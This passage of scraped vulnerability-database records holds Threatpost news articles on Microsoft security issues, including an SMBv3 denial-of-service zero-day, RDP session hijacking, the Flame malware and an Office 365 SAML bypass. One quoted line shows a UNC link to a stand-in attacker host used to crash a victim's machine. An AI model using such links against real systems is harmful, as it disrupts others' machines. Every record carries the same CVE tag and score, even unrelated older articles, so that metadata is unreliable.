\u201cdeeper\u201d than most people realize.\n\n 2. The killbit-fix is clearly insufficient, as there are bound to be many other ways of triggering the issue.\n\n 3. The bug might have weaseled it\u2019s way into third-party components, IF anyone outside of Microsoft had access to the broken ATL versions.\n\n 4. If this has happened, MS might have accidentally introduced security vulnerabilities into third-party products.\n\n 5. Depending on the optimization settings applied to the executables, it might require a bit of an effort to find out whether a vulnerable or non-vulnerable version of the code is present.\n\n 6. There might be a lot of recompiling next week.\n\n 7. IF this has gotten into third-party-products, I would bet that only a tiny fraction of software vendors will push out proper/timely updates.\n\nMicrosoft is rushing out an [emergency patch for the vulnerability](<https://threatpost.com/researcher-shows-killbit-no-defense-msvidctl-flaw-072709/>) on Tuesday.\n", "cvss3": {}, "published": "2009-07-27T15:29:15", "type": "threatpost", "title": "Researcher Shows Killbit is No Defense on MsVidCtl Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:45", "id": "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "href": "https://threatpost.com/researcher-shows-killbit-no-defense-msvidctl-flaw-072709/73016/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:08", "description": "Microsoft will not rush out an emergency patch for a zero-day vulnerability disclosed on Wednesday in the Windows implementation of the Server Message Block protocol.\n\nResearcher Laurent Gaffie announced in a tweet, below, that he\u2019d found a zero-day vulnerability in SMBv3 and released a [proof-of-concept exploit](<https://github.com/lgandx/PoC/tree/master/SMBv3%20Tree%20Connect>). He told Threatpost that he privately disclosed the issue to Microsoft on Sept. 25 and that Microsoft told him it had a patch ready for its December patch release, but decided to wait until its scheduled February update to release several SMB patches rather than a single fix in December. Microsoft considers the vulnerability, a remotely triggered denial-of-service bug, low-risk.\n\n> SMBv3 0day, Windows 2012, 2016 affected, have fun \ud83d\ude42 Oh&amp;if you understand this poc, bitching SDLC is appropriate \ud83d\ude42<https://t.co/xAsDOY54yl>\n> \n> \u2014 Responder (@PythonResponder) [February 1, 2017](<https://twitter.com/PythonResponder/status/826926681701113861>)\n\n\u201cWindows is the only platform with a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible. Our standard policy is that on issues of low risk, we remediate that risk via our current Update Tuesday schedule,\u201d a Microsoft spokesperson told Threatpost in email statement. The next scheduled Microsoft update is Feb. 14.\n\nGaffie said the vulnerability is specifically a null pointer dereference in SMB and that it affects Windows Server 2012 and 2016. He added that a joint analysis between himself and Microsoft concluded that code execution doesn\u2019t seem possible through an exploit of this vulnerability. SMB is generally not exposed to the Internet, though Gaffie said that outbound connections where clients connect to remote file servers are more likely to be allowed than inbound SMB connections over an open port 445.\n\n\u201cThis bug can be used to trigger a reboot on a given target, it can be either local (via netbios, llmnr poisoning) or remote via a UNC link (example: adding an image with a link: \\\\\\[attacker.com](<http://attacker.com/>)\\file.jpg in an email),\u201d Gaffie said. \u201cIt\u2019s important to note that this trivial bug should have been caught immediately by their SDLC process, but surprisingly it was not. \u201cThis means that the new code base was simply not audited or fuzzed before shipping it on their latest operating systems.\u201d\n\nGaffie also said he decided to release details prior to the availability of a patch because it\u2019s not his first experience working with Microsoft where they have delayed a patch release for one of his bugs.\n\n\u201cI decided to release this bug one week before the patch is released, because it is not the first time Microsoft sits on my bugs,\u201d he said. \u201cI\u2019m doing free work here with them (I\u2019m not paid in anyways for that) with the goal of helping their users. When they sit on a bug like this one, they\u2019re not helping their users but doing marketing damage control, and opportunistic patch release. This attitude is wrong for their users, and for the security community at large.\u201d\n\nJohannes Ullrich, dean of research at the SANS Institute and director of the SANS Internet Storm Center, said he ran Gaffie\u2019s exploit and could confirm that it caused a crash on a fully patched Windows 10 system.\n\n\u201cModern Windows versions have several protection mechanisms to prevent remote execution for exploits like this,\u201d Ullrich said. \u201cIt would likely be difficult, but not necessarily impossible.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/02/06230816/Screen-Shot-2017-02-02-at-1_29_33-PM.png>)\n\nUllrich published a post on the SANS ISC site describing [his testing of Gaffie\u2019s exploit](<https://isc.sans.edu/diary/Windows%2BSMBv3%2BDenial%2Bof%2BService%2BProof%2Bof%2BConcept%2B%280%2BDay%2BExploit%29/22029>). The PoC would require an attacker to send a link to a victim, luring them to connect to a malicious SMB server instance.\n\n\u201cA URL like \\\\\\\\[server ip address\\IPC$ would trigger the exploit,\u201d Ullrich said. \u201cI have tested it in Edge and Internet Explorer on Windows 10 with a local html file like that and it shut down the system immediately.\n\n\u201cThe exploit implements its own SMB server, so it is as easy as running the exploit, making sure the user can connect (e.g. firewall issues) and then sending the \u2018right\u2019 link to the user,\u201d Ullrich said. \u201cThis is pretty easy to exploit. Took me maybe 10 minutes to get it to work. The exploit comes without instructions.\u201d\n\nUllrich explained that the attacker will respond with a crafted Tree Connect Response\u2014Tree Connect Requests are sent to Windows Servers when users connect to shares\u2014that is lengthy and also includes a \u201clong trailer.\u201d He explained in the SANS ISC post that the tree connect response message consists of a NetBIOS header and message type of a total length of 1580 bytes, and a SMB2 header that is 64 bytes long. The Tree Connect Response message has a fixed length of 8 bytes in addition to the fixed header.\n\n\u201cThis is where the message should end. But apparently, since the total message size according to the NetBIOS header is larger, Windows keeps on decoding in the crafted header (all \u2018C\u2019s\u2019 in the exploit), which then triggers the buffer overflow,\u201d Ullrich said.\n", "cvss3": {}, "published": "2017-02-03T08:36:13", "type": "threatpost", "title": "Microsoft Waits for Patch Tuesday to Fix SMB Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-02-03T19:56:30", "id": "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "href": "https://threatpost.com/microsoft-waits-for-patch-tuesday-to-fix-smb-zero-day/123541/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:25", "description": "Microsoft says a recent patch for Outlook 2007 after it caused slow performance and problems with third party e-mail services. Microsoft withdrew a software update [released last week](<https://threatpost.com/microsoft-closes-door-stuxnet-december-patch-121410/>) after reports that the update, to its Outlook 2007 e-mail product, was causing problems for customers connecting to third party e-mail products. \n\nThe company has withdrawn the update [KB2412171](<http://support.microsoft.com/kb/2412171>) from its Microsoft Update service, [according to a blog post](<http://blogs.msdn.com/b/outlook/archive/2010/12/17/issues-with-the-recent-update-for-outlook-2007.aspx>). Microsoft recommends that customers who have installed it and encountered problems uninstall the patch.\n\nUsers began reporting problems with the Outlook 2007 update soon after it was released on December 14. Among other things, customers reported severe slowdowns in the Outlook 2007 application when moving between mail folders or clicking on Calendar or Task links. \n\nCustomers who used Outlook to send and receive messages from e-mail servers that were not running Microsoft\u2019s Exchange e-mail server software, including Gmail and Windows Live Hotmail. In addition, the update prevented Gmail users from connecting to Gmail\u2019s mail servers if the Outlook Secure Password Authentication (SPA) option was enabled, and broke Auto Archiving for IMAP, POP3 and Oulook Live Connector Accounts that were managed using Outlook, if no Exchange Server account was configured in the same Outlook profile, Microsoft said. \n\nMicrosoft apologized for the disruption and has provided instructions for removing the update while the company investigates the performance issues. \n", "cvss3": {}, "published": "2010-12-21T17:21:16", "type": "threatpost", "title": "Microsoft Withdraws Outlook Update After Gmail Conflicts", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:28", "id": "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "href": "https://threatpost.com/microsoft-withdraws-outlook-update-after-gmail-conflicts-122110/74796/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:56", "description": "A researcher has exposed how attackers with local admin privileges could use native command-line Windows tools to hijack other users\u2019 sessions without credentials.\n\nResearcher Alexander Korznikov on Friday published a [report](<http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html>) in which he describes how he could, locally and remotely via Remote Desktop Protocol (RDP), access other users\u2019 sessions\u2014even sessions that have been disconnected for some time\u2014with one command.\n\nKorznikov said an attacker could access domain admin sessions, read documents, and access systems, cloud domains or applications (email, Notepad, others) that the user has previously logged in to. He said he tested his attack on Windows 2012 and Windows 2008 servers, as well as Windows 10 and Windows 7 and all that is required is the NT AUTHORITY/SYSTEM command line, or to create a service that will connect a session back to the attacker\u2019s.\n\n\u201cSomeone can say, \u2018If you are admin, you can dump a server\u2019s memory and parse it.\u2019 That\u2019s correct, but you don\u2019t need it any more,\u201d Korznikov told Threatpost. \u201cJust two simple commands and you are in. The most incredible thing is that I don\u2019t need to know the credentials of the hijacked user. It is pure password-less hijacking.\u201d\n\nhttps://www.youtube.com/watch?v=oPk5off3yUg\n\nhttps://www.youtube.com/watch?v=VytjV2kPwSg\n\nResearcher Kevin Beaumont, meanwhile, published a [separate report](<https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6#.tlqebcmqe>) essentially confirming Korznikov\u2019s work adding that by running the tscon.exe command as the SYSTEM user, an attacker could also connect to any session without a password.\n\n\u201cIt doesn\u2019t prompt, it just connects you to the user\u2019s desktop. I believe this is due to the way session shadowing was implemented in Microsoft Windows, and it runs throughout the years like this,\u201d Beaumont wrote.\n\nBeaumont said that his and Korznikov\u2019s research could bypass the work required to dump server memory and parse for passwords; this provides instant access to the target\u2019s desktop without leaving artifacts in a log or needing to use external tools such as Metaspoit.\n\n\u201cThis isn\u2019t about SYSTEM \u2014 this is about what you can do with it very quickly, and quietly. Attackers aren\u2019t interested in playing, they\u2019re interested in what they can do with techniques. This is a very valid technique,\u201d Beaumont wrote. \u201cSo, you have full blown RDP session hijacking, with a single command.\u201d\n\nKorznikov said he confirmed with Benjamin Delpy, who six years ago disclosed [similar findings](<http://blog.gentilkiwi.com/securite/vol-de-session-rdp>), that this was a Windows feature and not a vulnerability, but that does not discount the attack value of the situation, he said. Microsoft, for its part, is unlikely to patch this.\n\n\u201cThe issue described in the report is not a security vulnerability as it requires local administrator rights on the machine,\u201d a Microsoft spokesperson told Threatpost.\n\nKorznikov said he did not disclose his findings to Microsoft prior to publication of his report last week because it was a design flow issue, out of scope for its bug bounties, and that he did not want to wait \u201csix months until resolution for a CVE.\u201d\n\n\u201cIf you are admin, you can do everything. But here is the point: why and how you become admin? If some unprivileged user becomes admin using some kind of local privilege escalation, that\u2019s the problem\u2014and not the design flow\u2014we are talking about,\u201d Korznikov said. \u201cYou can do everything, even patch terminal services in a way that it will accept your token and allow shadowing mode, without a user\u2019s knowledge.\u201d\n", "cvss3": {}, "published": "2017-03-20T14:50:07", "type": "threatpost", "title": "Local Windows Admins Can Hijack Sessions Without Credentials", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-22T21:45:56", "id": "THREATPOST:1C5C89106D8897D6CDDFF572948A779A", "href": "https://threatpost.com/local-windows-admins-can-hijack-sessions-without-credentials/124427/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:00", "description": "[](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/>)Ten years.\n\nThat\u2019s a really long time. Think about what you were doing 10 years ago. Can you even remember? Maybe you were in college or high school, or cripes, even grade school. Or maybe you were working in security already, trying to figure out why your network kept getting overrun by viruses and attackers. \nYou know what Microsoft was doing 10 years ago?\n\nMaking really, really buggy software and watching its customers get owned left and right.\n\nThe early part of the 2000s was not a good time for the folks in Redmond. The company was taking a serious public beating for the instability and insecurity of its software, especially Internet Explorer, Outlook and Windows. VB script viruses such as I Love You, Melissa and others were running wild and large enterprise customers were screaming and pounding their shoes on the table and demanding answers from Microsoft.\n\nAnd Microsoft didn\u2019t have any.\n\nThe company had spent the last few years defending itself against the [Department of Justice\u2019s antitrust suit](<https://en.wikipedia.org/wiki/United_States_v._Microsoft>) centered on its Windows-IE monopoly. Much of its energy and resources\u2013not to mention money\u2013were devoted to the case, which Microsoft ultimately lost. Then, when the dust settled and company officials began looking around to see what had been going on while they were buried in federal courtrooms for three years, what they found was something like the information age version of the angry mob of villagers with torches and pitchforks.\n\nTo say that customers were not happy would be like saying Bill Gates has some money tucked away.\n\nAs it turned out, it was Gates himself who would provide the spark that would ultimately light a fire under the thousands of developers, product managers and engineers in Redmond to make security not just a priority, but the priority.\n\nThe email that Gates sent on Jan. 15, 2002, has come to be known as the [Trustworthy Computing memo](<https://threatpost.com/what-if-bill-gates-never-wrote-trustworthy-computing-memo-022410/>) and it is often pointed to as the origin of any sort of security awareness at Microsoft. But that\u2019s not really the case. [Gates\u2019s email](<http://www.computerbytesman.com/security/billsmemo.htm>) may have been the first real public expression of that sentiment, but some people inside the company had been thinking along those lines for some time.\n\nThe first step is admitting you have a problem, of course. But then you have to do something about it.\n\nA few months before Gates sent his email, Microsoft held a small conference in Redmond on what it then called trusted computing, bringing in a series of software security experts to discuss the principles and concepts that are the foundation of building more secure software. There were a few reporters there and some security researchers and the fascinating thing about it was that it was not Microsoft officials preaching their ideas to the audience, but trying to learn from the assembled experts. Odd.\n\nAnd well before Gates pushed the button on his email, there were people inside the company talking about the same concepts\u2013reliability, robustness and resistance to attack\u2013and advocating that developers build their applications around them.\n\nIn the months following the publication of Gates\u2019s email, Microsoft began a number of painful internal changes designed to refocus its developers around the idea of building secure software. Until then, the ship-or-die mentality had reigned supreme inside the company and features and functionality were the two-headed god that every developer worshipped. The chances of a team stoppping shipment because of a security problem at that point were zero point zero zero.\n\nBut within a few months of Gates\u2019s memo, that\u2019s exactly what happened. The company stopped development on several major products in order to put their developers through security training. Since then, the company has developed and released a slew of software security tools and methodologies and somehow turned Microsoft from the butt of every joke in the industry into an organization that\u2019s seen as doing it the right way.\n\nBut it wasn\u2019t just Microsoft that began changing in those days. The turnaround initiated by the company and Gates also took hold in the wider software industry and other industries, albeit much more slowly and spottily. After Microsoft\u2019s public declaration of the need for change, the sentiment began to spread to some of its larger customers. Then, more and more financial services firms, insurance companies, telecoms and other companies got on board, starting their own software security programs.\n\nBy the middle to latter part of the decade, Microsoft not only wasn\u2019t the object of every joke in the security community, it was being used as an example of how to do things right, how to get your collective stuff together and fix what\u2019s broken.\n\nSo, what Gates\u2019s memo turned out to be was not just a directive for Microsoft developers, but a call to arms for the rest of the industry, as well. It was by no means the beginning of the software security movement. Not even close. But it was, in fact, the beginning of something different and perhaps more important: widespread acceptance that software security needed to be a top priority.\n\nEven for Microsoft.\n\n*Microsoft homepage image via [SeattleClouds.com](<http://www.flickr.com/photos/42106306@N00/>)\u2018s Flickr photostream\n", "cvss3": {}, "published": "2012-01-12T14:43:00", "type": "threatpost", "title": "Ten Years After Gates's Memo, Effects Still Being Felt", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:00", "id": "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "href": "https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/76089/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:58", "description": "Mike Mimoso talks to Cody Pierce, director of vulnerability research and prevention with Endgame, at RSA Conference 2017 about how attackers are changing their techniques in the face of mitigations and continuing to base exploits around legitimate APIs and functions to thwart detection.\n\n[](<https://itunes.apple.com/us/podcast/the-threatpost-podcast/id315355232?mt=2>)[](<https://threatpost.com/category/podcasts/feed/>)\n\nDownload: [Cody_Pierce_on_Exploit_Development.mp3](<http://traffic.libsyn.com/digitalunderground/Cody_Pierce_on_Exploit_Development.mp3>)\n\nMusic by Chris Gonsalves\n", "cvss3": {}, "published": "2017-03-13T10:27:18", "type": "threatpost", "title": "Cody Pierce on the Future of Exploit Development", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-16T18:24:34", "id": "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "href": "https://threatpost.com/cody-pierce-on-exploit-development/124249/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:53", "description": "The attackers behind Flame can easily clean up compromised computers, according to research by security firm Symantec who found that some attackers have been able to use command-and-control (C&amp;C) servers to completely remove the malware from certain machines.\n\nAccording to a post on [Symantec\u2019s Security Response blog](<https://threatpost.com/attackers-can-use-self-destruct-feature-kill-flame-060812/>) yesterday, C&amp;C servers can send a file to infected computers to \u201cuninstall\u201d the Flame malware. The file, Browse32.ocx, then goes on to search the infected computer for every file used by Flame, removes them and even overwrite the disk with random bits of information and characters to cover its tracks.\n\nAccording to Symantec\u2019s analysis, the module contains two different exports: EnableBrowser, which initializes the module and StartBrowse, which does the actual deletion of the Flame files. Symantec also adds that the module appears to have been created on May 9 and looks similar to SUICIDE, an older module previously found in Flame\u2019s code.\n\nFlame was discovered and recent months and [disclosed by the Iranian government and western firms last week](<https://threatpost.com/whats-meaning-flame-malware-052912/>). The worm quickly drew comparisons to Stuxnet and Duqu. While the malware has apparently existed for years, it wasn\u2019t until this week that it was revealed the attackers [used a collision attack](<https://threatpost.com/microsoft-details-flame-hash-collision-attack-060612/>) to get the malware to [exploit a fraudulent certificate](<https://threatpost.com/flame-malware-uses-forged-microsoft-certificate-validate-components-060412/>) from Microsoft to attack Windows systems.\n", "cvss3": {}, "published": "2012-06-08T17:32:37", "type": "threatpost", "title": "Attackers Can Use 'Self-Destruct' Feature to Kill Flame", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:05", "id": "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "href": "https://threatpost.com/attackers-can-use-self-destruct-feature-kill-flame-060812/76669/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:06", "description": "[](<https://threatpost.com/microsoft-submits-tracking-protection-proposal-w3c-022511/>)Microsoft has submitted its proposal for web tracking protection to the W3C for consideration as a standard, hoping to get the organization\u2019s stamp of approval for its browser privacy technology. The proposal is in the earliest stages of the process and has not been approved, a process that can take years in some cases.\n\n[Microsoft\u2019s proposal for Web Tracking Protection](<http://www.w3.org/Submission/2011/SUBM-web-tracking-protection-20110224/>) is one of a number of similar ideas and methods that are floating around right now among technology companies, regulators and law makers. Mozilla has developed its own technology and [Google also is working on a permanent opt-out mechanism](<https://threatpost.com/google-releases-permanent-opt-out-extension-chrome-012411/>) for enabling users to prevent sites from tracking their movements with cookies. Much of the activity in this arena has popped up in the months since federal law makers began discussing the idea of a Do Not Track system for Internet users last year.\n\nMicrosoft has implemented a version of its Web Tracking Protection mechanism in the [release candidate for Internet Explorer 9](<https://threatpost.com/microsoft-releases-ie9-release-candidate-tracking-protection-021111/>), which the company released earlier this month. The company\u2019s proposal relies on the concept of filter lists, which Web site owners can publish and IE9, and presumably other browsers, can consume and parse. The lists comprise \u201cparts of [third-party URIs](<http://www.w3.org/Submission/2011/SUBM-web-tracking-protection-20110224/#dfn-third-party-uri> \"third party uri\" ) \nthat a browser may access automatically when referenced within a web page a user deliberately visits. \nRules in a [filter list](<http://www.w3.org/Submission/2011/SUBM-web-tracking-protection-20110224/#dfn-filter-list>) may change the way the user agent handles \n[third-party](<http://www.w3.org/Submission/2011/SUBM-web-tracking-protection-20110224/#dfn-third-party-uri> \"third party uri\" ) content. \nBy limiting the calls to these websites and blocking resources from other web pages, the [filter list](<http://www.w3.org/Submission/2011/SUBM-web-tracking-protection-20110224/#dfn-filter-list>) \nlimits the information other sites can collect about a user,\u201d Microsoft said in its proposal to the W3C.\n\nIn most cases, technologies such as Tracking Protection are being discussed and thought of in the context of blocking cookies and other methods that sites use to see what other sites their visitors have been to or where they came from. But these methods also can be used for blocking other kinds of downloadable content. \n\nIn Microsoft\u2019s proposal, the Tracking Protection system also implements a method for respecting the Do Not Track HTTP header.\n\n\u201cBy having both a header and a DOM property, websites can easily detect the user preference from both client and server code. \nWhen the [Do Not Track user preference](<http://www.w3.org/Submission/2011/SUBM-web-tracking-protection-20110224/#dfn-do-not-track-pref>) is set, \nthe user-agent _must_ apply the HTTP header to all HTTP requests, \nand the DOM property _must_ be applied to all documents. \nThe user agent is responsible for determining the user experience by which \nthe [Do Not Track user preference](<http://www.w3.org/Submission/2011/SUBM-web-tracking-protection-20110224/#dfn-do-not-track-pref>) is enabled,\u201d the proposal says.\n\nMicrosoft submitted its proposal to the W3C, an independent standards body, on Thursday. The group published the proposal, but that does not mean that it\u2019s been accepted as a standard or is anywhere close to acceptance. It\u2019s simply the first step in the process.\n", "cvss3": {}, "published": "2011-02-25T19:34:54", "type": "threatpost", "title": "Microsoft Submits Tracking Protection Proposal to W3C", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:07", "id": "THREATPOST:828471E05035E11C0ED67C67E1EA8F0D", "href": "https://threatpost.com/microsoft-submits-tracking-protection-proposal-w3c-022511/74968/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:58", "description": "[](<https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/>)Microsoft is warning customers that it has seen ongoing attacks against the recently disclosed padding oracle [vulnerability in ASP.NET](<https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/>) and is encouraging them to [implement a workaround](<http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx>) that will help protect against the publicly disclosed exploit for the bug.\n\nThe [workaround](<http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx>) that Microsoft has developed causes ASP.NET applications to return the same error message, regardless of what the actual error it encounters is. This prevents the server from sending error messages to the attacker that might give him important information about what error was caused on the application.\n\n\u201cA workaround you can use to prevent this \nvulnerability is to enable the &lt;customErrors&gt; feature of ASP.NET, \nand explicitly configure your applications to always return the same error page \n\u2013 regardless of the error encountered on the server. By mapping all \nerror pages to a single error page, you prevent a hacker from \ndistinguishing between the different types of errors that occur on a \nserver**,**\u201d Microsoft\u2019s Scott Guthrie said in a blog post explaining the wrokaround. \u201c**Important**: It is not enough to \nsimply turn on CustomErrors or have it set to RemoteOnly. You also need \nto make sure that all errors are configured to return the same error \npage. This requires you to explicitly set the \u201cdefaultRedirect\u201d attribute on the &lt;customErrors&gt; section and ensure that no per-status codes are set.\u201d\n\nHowever, the researcher who [demonstrated the ASP.NET attack](<https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/>) at the Ekoparty conference last week, Juliano Rizzo and Thai Duong, said that the [attack will work even without error messages](<https://twitter.com/thaidn/statuses/24832350146>) from the target application. \n\nMicrosoft security officials said that they plan to release a patch for the ASP.NET flaw, although they have not specified any time frame for the release. \n", "cvss3": {}, "published": "2010-09-21T15:04:11", "type": "threatpost", "title": "Microsoft Warns of Attacks Against ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:00:14", "id": "THREATPOST:4D225F38F43559CB340E0C0C20E1C9BD", "href": "https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/74498/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:25", "description": "A severe vulnerability in the way Microsoft Office 365 handles federated identities via SAML put an attacker in position to have access to any account and data, including email messages and files stored in the cloud-based service.\n\nMicrosoft pushed through a mitigation to the service on Jan. 5, seven hours after being notified by researchers Yiannis Kakavas and Klemen Bratec.\n\n\u201cThe attack surface was quite big (Outlook Online, OneDrive, Skype for Business, OneNote \u2013 depending on what the company has paid for in terms of licensing ),\u201d Kakavas and Bratec told Threatpost via email. \u201cAnd a malicious user exploiting this vulnerability could have gained access to very sensitive private and company information. (emails, internal documents etc. ).\u201d\n\nOffice 365 users in the line of fire that had configured domains as federated were extensive, worldwide and high profile, ranging from British Airways, Microsoft, Vodafone, Verizon and many others listed in a [report](<http://www.economyofmechanism.com/office365-authbypass.html#office365-authbypass>) [published](<https://bratec.si/security/2016/04/27/road-to-hell-paved-with-saml-assertions.html>) this week.\n\nKakavas, of the Greek Research and Technology Network, and Bratec of the Sola prihodnosti Maribor, identified the vulnerability in the SAML Service Provider implementation in Office 365. The flaw allowed for a \u201ccross-domain authentication bypass affecting all federated domains,\u201d the researchers wrote. SAML is the Security Assertion Markup Language, a standard used by organizations to exchange authentication and authorization data. SAML is used primarily as a means of enabling single sign-on between web domains.\n\nThe problem with Microsoft\u2019s implementation of SAML 2.0 in Office 365 is that the service fails to authenticate that the subject of the assertion being passed\u2014specifically the NameID element. The exchange must then rely on other values such as an IDPEmail attribute to validate the exchange.\n\n\u201cAs it turns out, the Service Provider used the Issuer of the Assertion only to find the mathing certificate in order to verify the SAML Response/Assertion signature, but didn\u2019t perform any sanity checks on the supplied value of the IDPEmail attribute,\u201d the researchers wrote. \u201cThat basically means that it would happily consume assertions, asserting that Identity Provider X has authenticated users of Identity Provider Y.\u201d\n\nThe researchers describe the technical details in their report. They told Threatpost that the flaw was relatively easy to exploit, but added there is not indication the flaw had ever been publicly exploited, nor how long it was present in Office 365 before it was found.\n\n\u201cAll an attacker needed was a trial subscription to Office 365 and a SAML 2.0 Identity Provider installation. There is some bare minimum of SAML knowledge once must have, but the process of setting up SAML SSO with Office 365 is well documented and easy to follow,\u201d the researchers said. \u201cA more advanced attacker with slightly better SAML knowledge would be able to script a tool and perform the attack in an automated manner without the need of a SAML 2.0 Identity Provider.\u201d\n\nThe researchers said the flaw is not limited to SAML-based single sign-on implementations; they were able to carry out the same attack over Active Directory Federation Services.\n\n\u201cThe SAML Service Provider consumed the SAML assertion from the attacker\u2019s org Identity Provider even though the spmb.si domain is configured to be federated with WS-Trust, forwarded it to the token translation service which translated it to an WS-Trust token and \u2026 we were in,\u201d they wrote.\n\nThey told Threatpost: \u201cWe were surprised that the organizations that have their domains federated using WS-Trust and ADFS were also vulnerable to this. We know that pretty much only academic institutions use SAML 2.0 SSO, so in the beginning the number of vulnerable organizations seemed to be relatively small.\u201d\n\nThe two said they were awarded close to the maximum bounty from Microsoft for their research; the bounty pays between $500 and $15,000 USD.\n", "cvss3": {}, "published": "2016-04-28T10:44:58", "type": "threatpost", "title": "Office 365 Vulnerability Exposed Any Federated Account", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-29T16:54:19", "id": "THREATPOST:0B64A7C04FF47971B650E17B53C45FD2", "href": "https://threatpost.com/office-365-vulnerability-exposed-any-federated-account/117716/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:54", "description": "The Electronic Frontier Foundation is blasting Microsoft for its \u201cmalicious\u201d and \u201cannoying\u201d tactics when it comes to prodding Windows users to update their operating system to Windows 10.\n\nThe digital watchdog group says Microsoft\u2019s strategy of pushing the Windows 10 upgrade application onto users systems was unwelcome by many and the company crossed the line when users began uninstalling the app and Microsoft reacted by changing the app multiple times and bundling it into various security patches, creating a \u201ccat-and-mouse game to uninstall it,\u201d [wrote Amul Kalia, legal intake coordinator at the EFF](<https://www.eff.org/deeplinks/2016/08/windows-10-microsoft-blatantly-disregards-user-choice-and-privacy-deep-dive>).\n\n\u201cThe tactics Microsoft employed to get users of earlier versions of Windows to upgrade to Windows 10 went from annoying to downright malicious,\u201d he said. \u201cThe app couldn\u2019t be easily hidden or removed.\u201d\n\nKalia blames Microsoft\u2019s ambitious stated goal to install Windows 10 on one billion devices by the end of 2018 for its drive to \u201caggressively\u201d push the OS update on users. Officially Microsoft called the update campaign Get Windows 10 (GWX) and offered Windows 7 and 8.1 users the ability to upgrade to Windows 10 for free before July 29, 2016. According to Microsoft, 300 million devices were running Windows 10 in May, but it\u2019s unclear how many upgraded using the GWX app.\n\nWith GWX Microsoft sparked a vocal user backlash from some Windows users who insisted they were forced to upgrade to Windows 10. The hostile response also included four lawsuits against Microsoft for its \u201cquestionable\u201d upgrade tactics. New York Attorney General Eric Schneiderman announced he would be pursuing a GWX investigation as well.\n\nWhen asked to comment on the EFF\u2019s critique of its GWX efforts Microsoft supplied Threatpost with the boilerplate statement: \u201cMicrosoft is committed to customer privacy and ensuring that customers have the information and tools they need to make informed decisions. We listened to feedback from our customers and evolved our approach to the upgrade process. Windows 10 continues to have the highest satisfaction of any version of Windows.\u201d\n\nOriginally, Microsoft pushed the Windows 10 upgrade app via its Windows Update system. Users who received the app had a Windows 10 upgrade icon placed in their system tray that doubled as a way to initiate the OS upgrade download as well as offering an advertisement that boasted new Windows 10 features.\n\nOver time Microsoft became more aggressive, according to the EFF, bundling Windows 10 ads as part of an Internet Explorer security patch. Also criticized was the fact in many instances Microsoft didn\u2019t just download the Windows 10 upgrade app, but also downloaded the entire required Windows 10 installation files (4GB).\n\nBut the EFF maintains on May 2016 Microsoft crossed a line when it changed the expected behavior of a dialog prompt used in a window tied to 